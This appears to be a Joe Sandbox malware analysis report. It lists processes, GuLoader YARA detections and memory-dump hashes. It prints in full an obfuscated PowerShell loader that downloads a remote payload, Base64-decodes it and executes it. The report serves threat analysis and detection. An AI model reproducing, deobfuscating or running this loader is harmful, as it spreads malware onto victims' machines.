mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi: Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays (Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays (Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun. Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt Vil) Rub ');Orfrays $Thanatolog;"
                                    Imagebase:0x7ff6eb350000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:07:10:17
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff68cce0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:07:10:26
                                    Start date:21/10/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi: Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays (Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays (Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun. Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt Vil) Rub ');Orfrays $Thanatolog;"
                                    Imagebase:0xf70000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2865648783.0000000008A40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2850277699.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2865783140.00000000095EB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Target ID:8
                                    Start time:07:10:26
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff68cce0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Reset < >
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1713580670.00007FFE7E000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7e000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a8ba0f39e37e7919c6b6b188ef772d3ccdacd02688f837c01cc764f3abd3713b
                                      • Instruction ID: e63408f16b595cee63365ecc6fd4f3969d3d15ef56ce8c6f2537a54bfdd393c0
                                      • Opcode Fuzzy Hash: a8ba0f39e37e7919c6b6b188ef772d3ccdacd02688f837c01cc764f3abd3713b
                                      • Instruction Fuzzy Hash: 50518830518A4D8FEB68DF28D8557B977D2FF58310F14422EE85DC36A5CF38A5448B82
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1713580670.00007FFE7E000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7e000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b430ddc9444a29b85841ace4b51f0470ae14614acf753aaf2f4feea9415c322e
                                      • Instruction ID: 773ff87f0fd47ad79ac49ba303549501ae22049c13eb7676194297a27c090e85
                                      • Opcode Fuzzy Hash: b430ddc9444a29b85841ace4b51f0470ae14614acf753aaf2f4feea9415c322e
                                      • Instruction Fuzzy Hash: 02519630518A4D8FEBA8DF28D8557F976D2FB54310F14822ED85DC32A5DF38A9448B82
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1713580670.00007FFE7E000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7e000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 81a3766ae6b91bf5a6627022715a6ae3d08315b54346b31e4dee7c228b4ea1b8
                                      • Instruction ID: 4b95b70ec27127ad2190d58f5ffd01e991b56fe44fa9532241aa17562aab970a
                                      • Opcode Fuzzy Hash: 81a3766ae6b91bf5a6627022715a6ae3d08315b54346b31e4dee7c228b4ea1b8
                                      • Instruction Fuzzy Hash: 7C31F931829A4E8EFBB4AF14DC0ABF93292FB45319F400539D49E861A2DE3D7985CB11
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1714035667.00007FFE7E0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E0D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7e0d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2362a8419ad4b325bcf2ca136b3fb36009cafd9fbfb76ff516545ce3d30c296
                                      • Instruction ID: 008687fd650dad444f51d2ab63ed2d70d2cef2cc7018261c85c6389a5950f6ea
                                      • Opcode Fuzzy Hash: f2362a8419ad4b325bcf2ca136b3fb36009cafd9fbfb76ff516545ce3d30c296
                                      • Instruction Fuzzy Hash: BB119023A2EA8A4FE3A6D718A4551BD77D2EF86360B5801FAC0ADC71B6DD1DBC418341
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1713580670.00007FFE7E000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7e000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                      • Instruction ID: 9d1904deb8f4bb87532d991fdc4443ffc320d116e89059389cdef90f61fe54df
                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                      • Instruction Fuzzy Hash: E201677111CB0C4FD744EF0CE451AB5B7E0FB95364F10056EE58AC3661D636E881CB45
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1714035667.00007FFE7E0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E0D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7e0d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 914104361a2c6d487a0bbc1ff439744f2438fb6ee42d69f4b1793d2835055b2a
                                      • Instruction ID: c3e04d0f6c3e13f355ee46c6ca231075986a91c8f43ecc244403ae679d5ec938
                                      • Opcode Fuzzy Hash: 914104361a2c6d487a0bbc1ff439744f2438fb6ee42d69f4b1793d2835055b2a
                                      • Instruction Fuzzy Hash: D101D623E2AAA98FE3A5D65C64552BDB7D2FF45661B6901B7D85CC32A2EE086C004380
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1714035667.00007FFE7E0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E0D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7e0d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61e577c38b91d0980005de309e7816af46c09476284d451b54ac4c13ee1baf72
                                      • Instruction ID: e9938b5af5d8067fabcc861e65abc7687b959ba7ea9b6a2123dc106f1c8b51a8
                                      • Opcode Fuzzy Hash: 61e577c38b91d0980005de309e7816af46c09476284d451b54ac4c13ee1baf72
                                      • Instruction Fuzzy Hash: 52F03032A2C5558EA259D718B4450BD73D2FB85315B5400BAD05DC25A2DE2ABC528685
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1714035667.00007FFE7E0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E0D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7e0d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2a119cb729b7353129cea6df0de3a7c7ed972e77708c0c3b2ef95dcfc9367cd
                                      • Instruction ID: 258a7922f1be775505ebc4af87c3131ac3a6bcd3bb2080bf59986f150d0fc95d
                                      • Opcode Fuzzy Hash: b2a119cb729b7353129cea6df0de3a7c7ed972e77708c0c3b2ef95dcfc9367cd
                                      • Instruction Fuzzy Hash: 36E0C233B5CD0C096759D25C680A1FAB3D3DBC8131B194337C06EC3145ED22E4174250
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1714035667.00007FFE7E0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E0D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7e0d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c1dd3f9c81a70d28c01b6627cd0cef7f29e0b8f9d62b6b57ab8bc6979987f65f
                                      • Instruction ID: fe8fb6c2a8fd5f99af16a8189e3a2ca41e779621b1d217f92ea114ebb725d629
                                      • Opcode Fuzzy Hash: c1dd3f9c81a70d28c01b6627cd0cef7f29e0b8f9d62b6b57ab8bc6979987f65f
                                      • Instruction Fuzzy Hash: E0F0E552E0EACA1FE7A1F63804591686BE2EF66215B5C00FEC0ACC71B3EC2C6D458702
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1714035667.00007FFE7E0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E0D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffe7e0d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e56b493b89b3d03d340c8deef4635a1b24763c7a32ba1c2773349e732112b684
                                      • Instruction ID: 860ad79d254aae85e87c9e76db729316b13b7ceed6831fc7bc790a6f2e089bda
                                      • Opcode Fuzzy Hash: e56b493b89b3d03d340c8deef4635a1b24763c7a32ba1c2773349e732112b684
                                      • Instruction Fuzzy Hash: 46D01235D3592E8EE3B4EB58940917DB1D2FF58611B550676D85DD3261EE282C404780
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2831179214.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_32b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c633bf0f5c859e09dd89e1e13a7708cb31baf16e70154e405ffe95dfb0af30cd
                                      • Instruction ID: dc695cde5c96da98826f9f48e39650a78b6f912be85bf2e65cccbc3449a77da0
                                      • Opcode Fuzzy Hash: c633bf0f5c859e09dd89e1e13a7708cb31baf16e70154e405ffe95dfb0af30cd
                                      • Instruction Fuzzy Hash: 1DB18170E2020ADFDF10CFA8D9817EEFBF2AF88354F198529D415A7254EB749885CB91
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2831179214.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_32b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0d4ccf98cfe30abfc8baee0e2a784863aae43ce436c513bbf5fb5bac7f9243c9
                                      • Instruction ID: c6fbc88780fabfee36656ca0de5aac6bc60e65f556f060315c45f42419e6b845
                                      • Opcode Fuzzy Hash: 0d4ccf98cfe30abfc8baee0e2a784863aae43ce436c513bbf5fb5bac7f9243c9
                                      • Instruction Fuzzy Hash: D4B16F71E1020A9FDF14CFA8CD917DDBBF2AF48394F188529D815E7294EB749885CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$x."k$x."k$-"k$-"k
                                      • API String ID: 0-2903908483
                                      • Opcode ID: 85a9e5a40041ff65faff291799e0043746c6fc7c761899116ec4488b29fac759
                                      • Instruction ID: badc1d1e4aba4874a0e5d18ac30c98953d8b66a09c5f252322394722b8e9308d
                                      • Opcode Fuzzy Hash: 85a9e5a40041ff65faff291799e0043746c6fc7c761899116ec4488b29fac759
                                      • Instruction Fuzzy Hash: 417280B4A10209DFC714DBA8C951B9EBBB2EB88308F14C5A9D905AF755CB71DC81CFA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f1l$(f1l$(f1l$(f1l$(f1l$(f1l$(f1l$(f1l$4'_q$4'_q$tL#k
                                      • API String ID: 0-3513291722
                                      • Opcode ID: a3b99be4d465f299694fa993ec6816c0aa9a0a0327512a4e51254cf74ebe35db
                                      • Instruction ID: 40de835b5550d6f60e2e6762c07a15e13d8cf621c9e263e6a1e9e90de0adb49c
                                      • Opcode Fuzzy Hash: a3b99be4d465f299694fa993ec6816c0aa9a0a0327512a4e51254cf74ebe35db
                                      • Instruction Fuzzy Hash: 4F929CB4B00219DFD754CB58C881B59BBB2FB89308F25C1A8D909AB755DB72EC81CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f1l$(f1l$(f1l$(f1l$(f1l$4'_q$tL#k
                                      • API String ID: 0-570438686
                                      • Opcode ID: 9c5ca38db8389332ce23e1267ca0547cbbeb1e875c3ee8c389e377e22d0233a2
                                      • Instruction ID: e24316f253aa29f7a2024ecd8757cb5d2ddf56437b6a4b64da32008179db4f7f
                                      • Opcode Fuzzy Hash: 9c5ca38db8389332ce23e1267ca0547cbbeb1e875c3ee8c389e377e22d0233a2
                                      • Instruction Fuzzy Hash: C6728BB4A00215DFD764CB18C981F59BBB2FB89308F15C1A8D909AB355DB72ED82CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f1l$(f1l$4'_q$4'_q$x."k$x."k$-"k
                                      • API String ID: 0-453440438
                                      • Opcode ID: 540226414885856a28c033567ec4d442dd7eb1d481427d8fe058150810a2b905
                                      • Instruction ID: 6c78de5b8148e9cbf013fc9f5a0a559a74f003464237687f8b175cafbbcce45c
                                      • Opcode Fuzzy Hash: 540226414885856a28c033567ec4d442dd7eb1d481427d8fe058150810a2b905
                                      • Instruction Fuzzy Hash: 5FF1D1B4B002189FC714DBA8C851F6EBBB3AF84308F1084A9D909AF795DB759D81CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2861000025.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                      Joe Sandbox IDA Plugin
